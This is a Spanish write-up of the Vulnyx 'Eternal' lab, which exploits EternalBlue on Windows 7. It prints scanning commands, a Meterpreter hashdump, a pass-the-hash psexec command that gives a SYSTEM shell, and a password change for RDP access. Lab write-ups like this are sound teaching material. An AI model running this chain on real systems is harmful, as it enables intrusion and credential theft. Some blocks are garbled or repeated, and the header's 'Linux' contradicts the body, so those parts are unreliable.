	Vulnyx - Eternal	
	Sistema Operativo:	Linux
	Dificultad:	Easy
	Release:	03/02/2024
	Técnicas utilizadas	
	Vulnerabilidad EternalBlue (CVE-2017-0144)	

En este write-up, se detalla el proceso de explotación de la máquina Eternal de Vulnyx, un sistema Windows 7 Entrerprise con Service Pack 1 que utiliza el protocolo SMBv1. Este sistema es vulnerable a la famosa vulnerabilidad EternalBlue (CVE-2017-0144), que permite la ejecución remota de código y el control total del sistema por parte de un atacante no autenticado. A lo largo de este documento, se describen las técnicas y herramientas utilizadas para identificar y explotar esta vulnerabilidad, así como los pasos posteriores para obtener acceso completo al sistema objetivo.

Enumeración

Para comenzar la enumeración de la red, utilicé el comando arp-scan -I eth1 --localnet para identificar todos los hosts disponibles en mi red.

La dirección MAC que utilizan las máquinas de VirtualBox comienza por "08", así que, filtré los resultados utilizando una combinación del comando grep para filtrar las líneas que contienen "08", sed para seleccionar la segunda línea, y awk para extraer y formatear la dirección IP.

```
(root@kali)-[/home/administrador/Descargas]
# arp-scan -I eth1 --localnet | grep "08" | sed '2q;d' | awk {'print $1'}
192.168.1.12

(root@kali)-[/home/administrador/Descargas]
# []
```

Una vez que identificada la dirección IP de la máquina objetivo, utilicé el comando **nmap -p- -sS -sC -sV --min-rate 5000** -vvv -Pn 192.168.1.12 -oN scanner eternal para descubrir los puertos abiertos y sus versiones:

- (-p-): realiza un escaneo de todos los puertos abiertos.
- (-sS): utilizado para realizar un escaneo TCP SYN, siendo este tipo de escaneo el más común y rápido, además de
 ser relativamente sigiloso ya que no llega a completar las conexiones TCP. Habitualmente se conoce esta técnica
 como sondeo de medio abierto (half open). Este sondeo consiste en enviar un paquete SYN, si recibe un paquete
 SYN/ACK indica que el puerto está abierto, en caso contrario, si recibe un paquete RST (reset), indica que el
 puerto está cerrado y si no recibe respuesta, se marca como filtrado.
- (-sC): utiliza los script por defecto para descubrir información adicional y posibles vulnerabilidades. Esta opción
 es equivalente a --script=default. Es necesario tener en cuenta que algunos de estos script se consideran intrusivos
 ya que podría ser detectado por sistemas de detección de intrusiones, por lo que no se deben ejecutar en una red
 sin permiso.
- (-sV): Activa la detección de versiones. Esto es muy útil para identificar posibles vectores de ataque si la versión de algún servicio disponible es vulnerable.
- (--min-rate 5000): ajusta la velocidad de envío a 5000 paquetes por segundo.

• (-Pn): asume que la máquina a analizar está activa y omite la fase de descubrimiento de hosts.

```
Communication (Communication Communication C
```

La herramienta CrackMapExec proporciona información detallada sobre el sistema operativo del objetivo.

Análisis del puerto 445 (SMB)

La máquina objetivo es un sistema Windows 7 Enterprise con Service Pack 1 instalado, que utiliza el protocolo SMBv1. Este protocolo es conocido por sus vulnerabilidades críticas, entre las cuales destaca EternalBlue. EternalBlue es una vulnerabilidad de ejecución remota de código en el servicio de servidor de Microsoft, utilizado para compartir archivos e impresoras. Esta vulnerabilidad permite a un atacante no autenticado ejecutar código arbitrario y tomar el control del sistema.

EternalBlue, identificado como CVE-2017-0144, explota una debilidad en la implementación del protocolo SMBv1. Esta vulnerabilidad fue descubierta por la Agencia de Seguridad Nacional de los Estados Unidos (NSA) y posteriormente filtrada por el grupo de hackers conocido como Shadow Brokers. EternalBlue aprovecha un error en la forma en que el servidor SMB maneja ciertos paquetes especialmente diseñados, permitiendo a un atacante enviar paquetes maliciosos que ejecutan código arbitrario en el sistema objetivo.

Para verificar si la máquina objetivo era vulnerable a EternalBlue, utilicé los scripts de Nmap específicos para esta vulnerabilidad.

Una vez confirmado que la máquina era vulnerable, configuré el exploit correspondiente utilizando un módulo de EternalBlue disponible en la suite de Metasploit. Tras la correcta configuración del exploit, procedí a ejecutarlo contra la máquina objetivo. El exploit se ejecutó con éxito, permitiéndome obtener el control total del sistema.

En este punto, es posible obtener los hashes de los usuarios disponibles en el sistema desde la consola de Meterpreter.

```
meterpreter > hashdump
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:bae41ca591dff9f200a0cb95dd636d60:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
MIKE:1001:aad3b435b51404eeaad3b435b51404ee:49d1acab366daee51dcc3e9af958aced:::
meterpreter >
```

Como era de esperar, la cuenta del usuario administrador no estaba habilitada; sin embargo, la cuenta del usuario MIKE sí estaba habilitada y además permitía la ejecución de comandos remotos.

Por tanto, accedí al sistema objetivo utilizando psexec de Impacket como usuario NT AUTHORITY\SYSTEM.

```
(administrador® kali)-[~/Descargas]
$ impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:49d1acab366daee51dcc3e9af958aced WORKGROUP/Mike@192.168.1.12
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on 192.168.1.12.....

[*] Found writable share ADMIN$
[*] Uploading file blujRPSP.exe

[*] Opening SVCManager on 192.168.1.12.....

[*] Creating service FpHD on 192.168.1.12.....

[*] Starting service FpHD.....

[!] Press help for extra shell commands
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.htm#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [Versi*n 6.1.7601]

Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> [
```

Posteriormente, cambié la contraseña de dicho usuario para poder conectarme mediante el protocolo RDP a la máquina objetivo.

```
| (administrador@ kali) - [-/Descargas] | crackmapexec smb 192.168.1.12 -u *MIKE" -p 1234 | SMB 192.168.1.12 445 MIKE-PC | [*] Windows 7 Enterprise 7601 Service Pack 1 x64 (name:MIKE-PC) (domain:MIKE-PC) (signing:False) (SMBv1:True) | SMB 192.168.1.12 445 MIKE-PC | [*] Windows 7 Enterprise 7601 Service Pack 1 x64 (name:MIKE-PC) (domain:MIKE-PC) (signing:False) (SMBv1:True) | SMB 192.168.1.12 445 MIKE-PC | [*] Windows 7 Enterprise 7601 Service Pack 1 x64 (name:MIKE-PC) (domain:MIKE-PC) (signing:False) (SMBv1:True) | SMB 192.168.1.12 445 MIKE-PC | [*] Windows 7 Enterprise 7601 Service Pack 1 x64 (name:MIKE-PC) (domain:MIKE-PC) (signing:False) (SMBv1:True) | SMB 192.168.1.12 445 MIKE-PC | [*] MIK
```

Antes de proceder, fue necesario habilitar el servicio RDP en la máquina víctima. Una vez habilitado, verifiqué que el puerto 3389 (RDP) estaba abierto mediante un análisis de Nmap.

Finalmente, utilicé rdesktop para establecer una conexión de escritorio remoto con la máquina objetivo, donde pude observar la flag de root.

